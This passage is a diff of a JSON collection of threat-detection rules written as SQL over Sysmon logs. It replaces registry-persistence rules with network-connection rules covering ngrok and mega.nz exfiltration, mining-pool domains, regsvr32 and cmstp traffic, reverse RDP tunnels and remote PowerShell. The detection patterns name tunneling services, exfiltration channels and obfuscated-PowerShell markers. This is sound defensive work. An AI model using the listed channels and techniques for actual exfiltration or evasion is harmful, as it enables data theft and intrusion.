+ "id": "18249279-932f-45e2-b37a-8925f2597670", + "status": "experimental", + "description": "Detects an executable accessing ngrok.io, which could be a sign of forbidden exfiltration of data exfiltration by malicious actors", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.persistence" + "attack.exfiltration", + "attack.t1567.001" ], "falsepositives": [ - "Unknown" + "Legitimate use of ngrok.io" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\Environment\\\\%' ESCAPE '\\') AND (Details IN ('powershell', 'pwsh') OR (Details LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR Details LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Details LIKE '%TVqQAAMAAAAEAAAA%' ESCAPE '\\' OR Details LIKE '%TVpQAAIAAAAEAA8A%' ESCAPE '\\' OR Details LIKE '%TVqAAAEAAAAEABAA%' ESCAPE '\\' OR Details LIKE '%TVoAAAAAAAAAAAAA%' ESCAPE '\\' OR Details LIKE '%TVpTAQEAAAAEAAAA%' ESCAPE '\\' OR Details LIKE '%SW52b2tlL%' ESCAPE '\\' OR Details LIKE '%ludm9rZS%' ESCAPE '\\' OR Details LIKE '%JbnZva2Ut%' ESCAPE '\\' OR Details LIKE '%SQBuAHYAbwBrAGUALQ%' ESCAPE '\\' OR Details LIKE '%kAbgB2AG8AawBlAC0A%' ESCAPE '\\' OR Details LIKE '%JAG4AdgBvAGsAZQAtA%' ESCAPE '\\') OR (Details LIKE 'SUVY%' ESCAPE '\\' OR Details LIKE 'SQBFAF%' ESCAPE '\\' OR Details LIKE 'SQBuAH%' ESCAPE '\\' OR Details LIKE 'cwBhA%' ESCAPE '\\' OR Details LIKE 'aWV4%' ESCAPE '\\' OR Details LIKE 'aQBlA%' ESCAPE '\\' OR Details LIKE 'R2V0%' ESCAPE '\\' OR Details LIKE 'dmFy%' ESCAPE '\\' OR Details LIKE 'dgBhA%' ESCAPE '\\' OR Details LIKE 'dXNpbm%' ESCAPE '\\' OR Details LIKE 'H4sIA%' ESCAPE '\\' OR Details LIKE 'Y21k%' ESCAPE '\\' OR Details LIKE 'cABhAH%' ESCAPE '\\' OR Details LIKE 'Qzpc%' ESCAPE '\\' OR Details LIKE 'Yzpc%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Initiated = 'true' AND DestinationHostname LIKE '%.ngrok.io' ESCAPE '\\')" ], - "filename": "registry_set_suspicious_env_variables.yml" + "filename": "net_connection_win_ngrok_io.yml" }, { - "title": "Potential Registry Persistence Attempt Via Windows Telemetry", - "id": "73a883d0-0348-4be4-a8d8-51031c2564f8", + "title": "Communication To Mega.nz", + "id": "fdeebdf0-9f3f-4d08-84a6-4c4d13e39fe4", "status": "test", - "description": "Detects potential persistence behaviour using the windows telemetry registry key.\nWindows telemetry makes use of the binary CompatTelRunner.exe to run a variety of commands and perform the actual telemetry collections.\nThis binary was created to be easily extensible, and to that end, it relies on the registry to instruct on which commands to run.\nThe problem is, it will run any arbitrary command without restriction of location or type.\n", - "author": "Lednyov Alexey, oscd.community, Sreeman", + "description": "Detects an executable accessing mega.co.nz, which could be a sign of forbidden file sharing use of data exfiltration by malicious actors", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1053.005" + "attack.exfiltration", + "attack.t1567.001" ], "falsepositives": [ - "Unknown" + "Legitimate use of mega.nz uploaders and tools" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\AppCompatFlags\\\\TelemetryController\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Command' ESCAPE '\\' AND (Details LIKE '%.sh%' ESCAPE '\\' OR Details LIKE '%.exe%' ESCAPE '\\' OR Details LIKE '%.dll%' ESCAPE '\\' OR Details LIKE '%.bin%' ESCAPE '\\' OR Details LIKE '%.bat%' ESCAPE '\\' OR Details LIKE '%.cmd%' ESCAPE '\\' OR Details LIKE '%.js%' ESCAPE '\\' OR Details LIKE '%.ps%' ESCAPE '\\' OR Details LIKE '%.vb%' ESCAPE '\\' OR Details LIKE '%.jar%' ESCAPE '\\' OR Details LIKE '%.hta%' ESCAPE '\\' OR Details LIKE '%.msi%' ESCAPE '\\' OR Details LIKE '%.vbs%' ESCAPE '\\')) AND NOT ((Details LIKE '%\\\\system32\\\\CompatTelRunner.exe%' ESCAPE '\\' OR Details LIKE '%\\\\system32\\\\DeviceCensus.exe%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Initiated = 'true' AND DestinationHostname LIKE '%api.mega.co.nz' ESCAPE '\\')" ], - "filename": "registry_set_telemetry_persistence.yml" + "filename": "net_connection_win_mega_nz.yml" }, { - "title": "UAC Bypass via Sdclt", - "id": "5b872a46-3b90-45c1-8419-f675db8053aa", - "status": "experimental", - "description": "Detects the pattern of UAC Bypass using registry key manipulation of sdclt.exe (e.g. UACMe 53)", - "author": "Omer Yampel, Christian Burkard (Nextron Systems)", + "title": "Regsvr32 Network Activity", + "id": "c7e91a02-d771-4a6d-a700-42587e0b1095", + "status": "test", + "description": "Detects network connections and DNS queries initiated by Regsvr32.exe", + "author": "Dmitriy Lifanov, oscd.community", "tags": [ + "attack.execution", + "attack.t1559.001", "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002", - "car.2019-04-001" + "attack.t1218.010" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((EventType = 'SetValue' AND TargetObject LIKE '%Software\\\\Classes\\\\exefile\\\\shell\\\\runas\\\\command\\\\isolatedCommand' ESCAPE '\\') OR (EventType = 'SetValue' AND TargetObject LIKE '%Software\\\\Classes\\\\Folder\\\\shell\\\\open\\\\command\\\\SymbolicLinkValue' ESCAPE '\\' AND Details REGEXP '-1[0-9]{3}\\\\Software\\\\Classes\\\\')))" + "SELECT * FROM logs WHERE (EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\')" ], - "filename": "registry_set_uac_bypass_sdclt.yml" + "filename": "net_connection_win_regsvr32_network_activity.yml" }, { - "title": "Lolbas OneDriveStandaloneUpdater.exe Proxy Download", - "id": "3aff0be0-7802-4a7e-a4fa-c60c74bc5e1d", - "status": "experimental", - "description": "Detects setting a custom URL for OneDriveStandaloneUpdater.exe to download a file from the Internet without executing any\nanomalous executables with suspicious arguments. The downloaded file will be in C:\\Users\\redacted\\AppData\\Local\\Microsoft\\OneDrive\\StandaloneUpdaterreSignInSettingsConfig.json\n", - "author": "frack113", + "title": "Network Communication With Crypto Mining Pool", + "id": "fa5b1358-b040-4403-9868-15f7d9ab6329", + "status": "stable", + "description": "Detects initiated network connections to crypto mining pools", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.impact", + "attack.t1496" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\OneDrive\\\\UpdateOfficeConfig\\\\UpdateRingSettingURLFromOC%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND DestinationHostname IN ('alimabi.cn', 'ap.luckpool.net', 'bcn.pool.minergate.com', 'bcn.vip.pool.minergate.com', 'bohemianpool.com', 'ca.minexmr.com', 'ca.monero.herominers.com', 'cbd.monerpool.org', 'cbdv2.monerpool.org', 'cryptmonero.com', 'crypto-pool.fr', 'crypto-pool.info', 'cryptonight-hub.miningpoolhub.com', 'd1pool.ddns.net', 'd5pool.us', 'daili01.monerpool.org', 'de.minexmr.com', 'dl.nbminer.com', 'donate.graef.in', 'donate.ssl.xmrig.com', 'donate.v2.xmrig.com', 'donate.xmrig.com', 'donate2.graef.in', 'drill.moneroworld.com', 'dwarfpool.com', 'emercoin.com', 'emercoin.net', 'emergate.net', 'ethereumpool.co', 'eu.luckpool.net', 'eu.minerpool.pw', 'fcn-xmr.pool.minergate.com', 'fee.xmrig.com', 'fr.minexmr.com', 'hellominer.com', 'herominers.com', 'huadong1-aeon.ppxxmr.com', 'iwanttoearn.money', 'jw-js1.ppxxmr.com', 'koto-pool.work', 'lhr.nbminer.com', 'lhr3.nbminer.com', 'linux.monerpool.org', 'lokiturtle.herominers.com', 'luckpool.net', 'masari.miner.rocks', 'mine.c3pool.com', 'mine.moneropool.com', 'mine.ppxxmr.com', 'mine.zpool.ca', 'mine1.ppxxmr.com', 'minemonero.gq', 'miner.ppxxmr.com', 'miner.rocks', 'minercircle.com', 'minergate.com', 'minerpool.pw', 'minerrocks.com', 'miners.pro', 'minerxmr.ru', 'minexmr.cn', 'minexmr.com', 'mining-help.ru', 'miningpoolhub.com', 'mixpools.org', 'moner.monerpool.org', 'moner1min.monerpool.org', 'monero-master.crypto-pool.fr', 'monero.crypto-pool.fr', 'monero.hashvault.pro', 'monero.herominers.com', 'monero.lindon-pool.win', 'monero.miners.pro', 'monero.riefly.id', 'monero.us.to', 'monerocean.stream', 'monerogb.com', 'monerohash.com', 'moneroocean.stream', 'moneropool.com', 'moneropool.nl', 'monerorx.com', 'monerpool.org', 'moriaxmr.com', 'mro.pool.minergate.com', 'multipool.us', 'myxmr.pw', 'na.luckpool.net', 'nanopool.org', 'nbminer.com', 'node3.luckpool.net', 'noobxmr.com', 'pangolinminer.comgandalph3000.com', 'pool.4i7i.com', 'pool.armornetwork.org', 'pool.cortins.tk', 'pool.gntl.co.uk', 'pool.hashvault.pro', 'pool.minergate.com', 'pool.minexmr.com', 'pool.monero.hashvault.pro', 'pool.ppxxmr.com', 'pool.somec.cc', 'pool.support', 'pool.supportxmr.com', 'pool.usa-138.com', 'pool.xmr.pt', 'pool.xmrfast.com', 'pool2.armornetwork.org', 'poolchange.ppxxmr.com', 'pooldd.com', 'poolmining.org', 'poolto.be', 'ppxvip1.ppxxmr.com', 'ppxxmr.com', 'prohash.net', 'r.twotouchauthentication.online', 'randomx.xmrig.com', 'ratchetmining.com', 'seed.emercoin.com', 'seed.emercoin.net', 'seed.emergate.net', 'seed1.joulecoin.org', 'seed2.joulecoin.org', 'seed3.joulecoin.org', 'seed4.joulecoin.org', 'seed5.joulecoin.org', 'seed6.joulecoin.org', 'seed7.joulecoin.org', 'seed8.joulecoin.org', 'sg.minexmr.com', 'sheepman.mine.bz', 'siamining.com', 'sumokoin.minerrocks.com', 'supportxmr.com', 'suprnova.cc', 'teracycle.net', 'trtl.cnpool.cc', 'trtl.pool.mine2gether.com', 'turtle.miner.rocks', 'us-west.minexmr.com', 'usxmrpool.com', 'viaxmr.com', 'webservicepag.webhop.net', 'xiazai.monerpool.org', 'xiazai1.monerpool.org', 'xmc.pool.minergate.com', 'xmo.pool.minergate.com', 'xmr-asia1.nanopool.org', 'xmr-au1.nanopool.org', 'xmr-eu1.nanopool.org', 'xmr-eu2.nanopool.org', 'xmr-jp1.nanopool.org', 'xmr-us-east1.nanopool.org', 'xmr-us-west1.nanopool.org', 'xmr-us.suprnova.cc', 'xmr-usa.dwarfpool.com', 'xmr.2miners.com', 'xmr.5b6b7b.ru', 'xmr.alimabi.cn', 'xmr.bohemianpool.com', 'xmr.crypto-pool.fr', 'xmr.crypto-pool.info', 'xmr.f2pool.com', 'xmr.hashcity.org', 'xmr.hex7e4.ru', 'xmr.ip28.net', 'xmr.monerpool.org', 'xmr.mypool.online', 'xmr.nanopool.org', 'xmr.pool.gntl.co.uk', 'xmr.pool.minergate.com', 'xmr.poolto.be', 'xmr.ppxxmr.com', 'xmr.prohash.net', 'xmr.simka.pw', 'xmr.somec.cc', 'xmr.suprnova.cc', 'xmr.usa-138.com', 'xmr.vip.pool.minergate.com', 'xmr1min.monerpool.org', 'xmrf.520fjh.org', 'xmrf.fjhan.club', 'xmrfast.com', 'xmrigcc.graef.in', 'xmrminer.cc', 'xmrpool.de', 'xmrpool.eu', 'xmrpool.me', 'xmrpool.net', 'xmrpool.xyz', 'xx11m.monerpool.org', 'xx11mv2.monerpool.org', 'xxx.hex7e4.ru', 'zarabotaibitok.ru', 'zer0day.ru'))" ], - "filename": "registry_set_lolbin_onedrivestandaloneupdater.yml" + "filename": "net_connection_win_crypto_mining_pools.yml" }, { - "title": "Enabling COR Profiler Environment Variables", - "id": "ad89044a-8f49-4673-9a55-cbd88a1b374f", - "status": "test", - "description": "This rule detects cor_enable_profiling and cor_profiler environment variables being set and configured.", - "author": "Jose Rodriguez (@Cyb3rPandaH), OTR (Open Threat Research)", + "title": "Script Initiated Connection to Non-Local Network", + "id": "992a6cae-db6a-43c8-9cec-76d7195c96fc", + "status": "experimental", + "description": "Detects a script interpreter wscript/cscript opening a network connection to a non-local network. Adversaries may use script to download malicious payloads.", + "author": "frack113, Florian Roth", "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.defense_evasion", - "attack.t1574.012" + "attack.command_and_control", + "attack.t1105" + ], + "falsepositives": [ + "Legitimate scripts" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'Setvalue' AND (TargetObject LIKE '%\\\\COR\\_ENABLE\\_PROFILING' ESCAPE '\\' OR TargetObject LIKE '%\\\\COR\\_PROFILER' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Initiated = 'true' AND (Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\')) AND NOT (((DestinationIp LIKE '127.%' ESCAPE '\\' OR DestinationIp LIKE '10.%' ESCAPE '\\' OR DestinationIp LIKE '172.%' ESCAPE '\\' OR DestinationIp LIKE '192.%' ESCAPE '\\' OR DestinationIp LIKE '169.254.%' ESCAPE '\\' OR DestinationIp LIKE '20.%' ESCAPE '\\')) OR ((DestinationIp LIKE '::1%' ESCAPE '\\' OR DestinationIp LIKE '0:0:0:0:0:0:0:1%' ESCAPE '\\' OR DestinationIp LIKE 'fe80:%' ESCAPE '\\' OR DestinationIp LIKE 'fc%' ESCAPE '\\' OR DestinationIp LIKE 'fd%' ESCAPE '\\'))))" ], - "filename": "registry_set_enabling_cor_profiler_env_variables.yml" + "filename": "net_connection_win_script_wan.yml" }, { - "title": "Potential Persistence Via App Paths Default Property", - "id": "707e097c-e20f-4f67-8807-1f72ff4500d6", + "title": "Communication To Ngrok Tunneling Service", + "id": "1d08ac94-400d-4469-a82f-daee9a908849", "status": "experimental", - "description": "Detects changes to the \"Default\" property for keys located in the \\Software\\Microsoft\\Windows\\CurrentVersion\\App Paths\\ registry. Which might be used as a method of persistence\nThe entries found under App Paths are used primarily for the following purposes.\nFirst, to map an application's executable file name to that file's fully qualified path.\nSecond, to pre-pend information to the PATH environment variable on a per-application, per-process basis.\n", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects an executable accessing an ngrok tunneling endpoint, which could be a sign of forbidden exfiltration of data exfiltration by malicious actors", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1546.012" + "attack.exfiltration", + "attack.command_and_control", + "attack.t1567", + "attack.t1568.002", + "attack.t1572", + "attack.t1090", + "attack.t1102", + "attack.s0508" ], "falsepositives": [ - "Legitimate applications registering their binary from on of the suspicious locations mentioned above (tune it)" + "Legitimate use of ngrok" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\App Paths%' ESCAPE '\\' AND (TargetObject LIKE '%(Default)' ESCAPE '\\' OR TargetObject LIKE '%Path' ESCAPE '\\') AND (Details LIKE '%\\\\Users\\\\Public%' ESCAPE '\\' OR Details LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR Details LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR Details LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR Details LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR Details LIKE '%\\%temp\\%%' ESCAPE '\\' OR Details LIKE '%\\%tmp\\%%' ESCAPE '\\' OR Details LIKE '%iex%' ESCAPE '\\' OR Details LIKE '%Invoke-%' ESCAPE '\\' OR Details LIKE '%rundll32%' ESCAPE '\\' OR Details LIKE '%regsvr32%' ESCAPE '\\' OR Details LIKE '%mshta%' ESCAPE '\\' OR Details LIKE '%cscript%' ESCAPE '\\' OR Details LIKE '%wscript%' ESCAPE '\\' OR Details LIKE '%.bat%' ESCAPE '\\' OR Details LIKE '%.hta%' ESCAPE '\\' OR Details LIKE '%.dll%' ESCAPE '\\' OR Details LIKE '%.ps1%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (DestinationHostname LIKE '%tunnel.us.ngrok.com%' ESCAPE '\\' OR DestinationHostname LIKE '%tunnel.eu.ngrok.com%' ESCAPE '\\' OR DestinationHostname LIKE '%tunnel.ap.ngrok.com%' ESCAPE '\\' OR DestinationHostname LIKE '%tunnel.au.ngrok.com%' ESCAPE '\\' OR DestinationHostname LIKE '%tunnel.sa.ngrok.com%' ESCAPE '\\' OR DestinationHostname LIKE '%tunnel.jp.ngrok.com%' ESCAPE '\\' OR DestinationHostname LIKE '%tunnel.in.ngrok.com%' ESCAPE '\\'))" ], - "filename": "registry_set_persistence_app_paths.yml" + "filename": "net_connection_win_ngrok_tunnel.yml" }, { - "title": "Blackbyte Ransomware Registry", - "id": "83314318-052a-4c90-a1ad-660ece38d276", + "title": "RDP Over Reverse SSH Tunnel", + "id": "5f699bc5-5446-4a4a-a0b7-5ef2885a3eb4", "status": "test", - "description": "BlackByte set three different registry values to escalate privileges and begin setting the stage for lateral movement and encryption", - "author": "frack113", + "description": "Detects svchost hosting RDP termsvcs communicating with the loopback address and on TCP port 3389", + "author": "Samir Bousseaden", "tags": [ - "attack.defense_evasion", - "attack.t1112" + "attack.command_and_control", + "attack.t1572", + "attack.lateral_movement", + "attack.t1021.001", + "car.2013-07-002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND (TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\LocalAccountTokenFilterPolicy' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\EnableLinkedConnections' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\FileSystem\\\\LongPathsEnabled' ESCAPE '\\') AND Details = 'DWORD (0x00000001)')" + "SELECT * FROM logs WHERE ((EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\svchost.exe' ESCAPE '\\' AND Initiated = 'true' AND SourcePort = '3389') AND (DestinationIp LIKE '127.%' ESCAPE '\\' OR DestinationIp = '::1'))" ], - "filename": "registry_set_blackbyte_ransomware.yml" + "filename": "net_connection_win_rdp_reverse_tunnel.yml" }, { - "title": "Potential Persistence Via MyComputer Registry Keys", - "id": "8fbe98a8-8f9d-44f8-aa71-8c572e29ef06", - "status": "experimental", - "description": "Detects modification to the \"Default\" value of the \"MyComputer\" key and subkeys to point to a custom binary that will be launched whenever the associated action is executed (see reference section for example)", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Suspicious Program Location with Network Connections", + "id": "7b434893-c57d-4f41-908d-6a17bf1ae98f", + "status": "test", + "description": "Detects programs with network connections running in suspicious files system locations", + "author": "Florian Roth (Nextron Systems), Tim Shelton", "tags": [ - "attack.persistence" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ - "Unlikely but if you experience FPs add specific processes and locations you would like to monitor for" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\MyComputer%' ESCAPE '\\' AND TargetObject LIKE '%(Default)' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\Users\\\\All Users\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Users\\\\Default\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Users\\\\Contacts\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Users\\\\Searches\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\config\\\\systemprofile\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\Fonts\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\IME\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\addins\\\\%' ESCAPE '\\') OR Image LIKE '%\\\\$Recycle.bin' ESCAPE '\\' OR Image LIKE 'C:\\\\Perflogs\\\\%' ESCAPE '\\') AND NOT ((Image LIKE 'C:\\\\Users\\\\Public\\\\IBM\\\\ClientSolutions\\\\Start\\_Programs\\\\%' ESCAPE '\\')))" ], - "filename": "registry_set_persistence_mycomputer.yml" + "filename": "net_connection_win_susp_prog_location_network_connection.yml" }, { - "title": "Service Binary in Suspicious Folder", - "id": "a07f0359-4c90-4dc4-a681-8ffea40b4f47", + "title": "Suspicious Network Connection Binary No CommandLine", + "id": "20384606-a124-4fec-acbb-8bd373728613", "status": "experimental", - "description": "Detect the creation of a service with a service binary located in a suspicious directory", - "author": "Florian Roth (Nextron Systems), frack113", + "description": "Detects suspicious network connections made by a well-known Windows binary run with no command line parameters", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1112" + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Start' ESCAPE '\\' AND (Image LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Perflogs\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\ADMIN$\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Temp\\\\%' ESCAPE '\\') AND Details IN ('DWORD (0x00000000)', 'DWORD (0x00000001)', 'DWORD (0x00000002)')) OR (EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\ImagePath' ESCAPE '\\' AND (Details LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Details LIKE '%\\\\Perflogs\\\\%' ESCAPE '\\' OR Details LIKE '%\\\\ADMIN$\\\\%' ESCAPE '\\' OR Details LIKE '%\\\\Temp\\\\%' ESCAPE '\\'))) AND NOT ((Image LIKE '%\\\\Common Files\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\Temp\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Initiated = 'true' AND (Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\dllhost.exe' ESCAPE '\\') AND (CommandLine LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR CommandLine LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR CommandLine LIKE '%\\\\dllhost.exe' ESCAPE '\\')) AND NOT ((CommandLine = '') OR (CommandLine = '')))" ], - "filename": "registry_set_creation_service_susp_folder.yml" + "filename": "net_connection_win_susp_binary_no_cmdline.yml" }, { - "title": "Adwind RAT / JRAT - Registry", - "id": "42f0e038-767e-4b85-9d96-2c6335bad0b5", - "status": "experimental", - "description": "Detects javaw.exe in AppData folder as used by Adwind / JRAT", - "author": "Florian Roth (Nextron Systems), Tom Ueltschi, Jonhnathan Ribeiro, oscd.community", + "title": "Remote PowerShell Session (Network)", + "id": "c539afac-c12a-46ed-b1bd-5a5567c9f045", + "status": "test", + "description": "Detects remote PowerShell connections by monitoring network outbound connections to ports 5985 or 5986 from a non-network service account.", + "author": "Roberto Rodriguez @Cyb3rWard0g", "tags": [ "attack.execution", - "attack.t1059.005", - "attack.t1059.007" + "attack.t1059.001", + "attack.lateral_movement", + "attack.t1021.006" + ], + "falsepositives": [ + "Legitimate usage of remote PowerShell, e.g. remote administration and monitoring.", + "Network Service user name of a not-covered localization" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run%' ESCAPE '\\' AND Details LIKE '\\%AppData\\%\\\\Roaming\\\\Oracle\\\\bin\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (DestinationPort IN ('5985', '5986') AND Initiated = 'true') AND NOT (((User LIKE '%NETWORK SERVICE%' ESCAPE '\\' OR User LIKE '%NETZWERKDIENST%' ESCAPE '\\' OR User LIKE '%SERVIZIO DI RETE%' ESCAPE '\\' OR User LIKE '%SERVICIO DE RED%' ESCAPE '\\') OR User LIKE '%SERVICE R%' ESCAPE '\\' AND User LIKE '%SEAU%' ESCAPE '\\' OR SourceIp LIKE '0:0:%' ESCAPE '\\' OR (Image LIKE 'C:\\\\Program Files\\\\Avast Software\\\\Avast\\\\AvastSvc.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\Avast Software\\\\Avast\\\\AvastSvc.exe' ESCAPE '\\')) OR (SourceIp IN ('::1', '127.0.0.1') AND DestinationIp IN ('::1', '127.0.0.1'))))" ], - "filename": "registry_set_mal_adwind.yml" + "filename": "net_connection_win_remote_powershell_session_network.yml" }, { - "title": "Potential Signing Bypass Via Windows Developer Features - Registry", - "id": "b110ebaf-697f-4da1-afd5-b536fa27a2c1", + "title": "Cmstp Making Network Connection", + "id": "efafe0bf-4238-479e-af8f-797bd3490d2d", "status": "experimental", - "description": "Detects when the enablement of developer features such as \"Developer Mode\" or \"Application Sideloading\". Which allows the user to install untrusted packages.", + "description": "Detects suspicious network connection by Cmstp", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion" + "attack.defense_evasion", + "attack.t1218.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND (TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\AppModelUnlock%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Policies\\\\Microsoft\\\\Windows\\\\Appx\\\\%' ESCAPE '\\') AND (TargetObject LIKE '%\\\\AllowAllTrustedApps' ESCAPE '\\' OR TargetObject LIKE '%\\\\AllowDevelopmentWithoutDevLicense' ESCAPE '\\') AND Details = 'DWORD (0x00000001)')" + "SELECT * FROM logs WHERE (EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\cmstp.exe' ESCAPE '\\' AND Initiated = 'true')" ], - "filename": "registry_set_turn_on_dev_features.yml" + "filename": "net_connection_win_susp_cmstp.yml" }, { - "title": "NET NGenAssemblyUsageLog Registry Key Tamper", - "id": "28036918-04d3-423d-91c0-55ecf99fb892", - "status": "experimental", - "description": "Detects changes to the NGenAssemblyUsageLog registry key.\n.NET Usage Log output location can be controlled by setting the NGenAssemblyUsageLog CLR configuration knob in the Registry or by configuring an environment variable (as described in the next section).\nBy simplify specifying an arbitrary value (e.g. fake output location or junk data) for the expected value, a Usage Log file for the .NET execution context will not be created.\n", - "author": "frack113", + "title": "Potential Dead Drop Resolvers", + "id": "297ae038-edc2-4b2e-bb3e-7c5fc94dd5c7", + "status": "test", + "description": "Detects an executable, which is not an internet browser, making DNS request to legit popular websites, which were seen to be used as dead drop resolvers in previous attacks.", + "author": "Sorina Ionescu", "tags": [ - "attack.defense_evasion", - "attack.t1112" + "attack.command_and_control", + "attack.t1102", + "attack.t1102.001" ], "falsepositives": [ - "Unknown" + "One might need to exclude other internet browsers found in it's network or other applications like ones mentioned above from 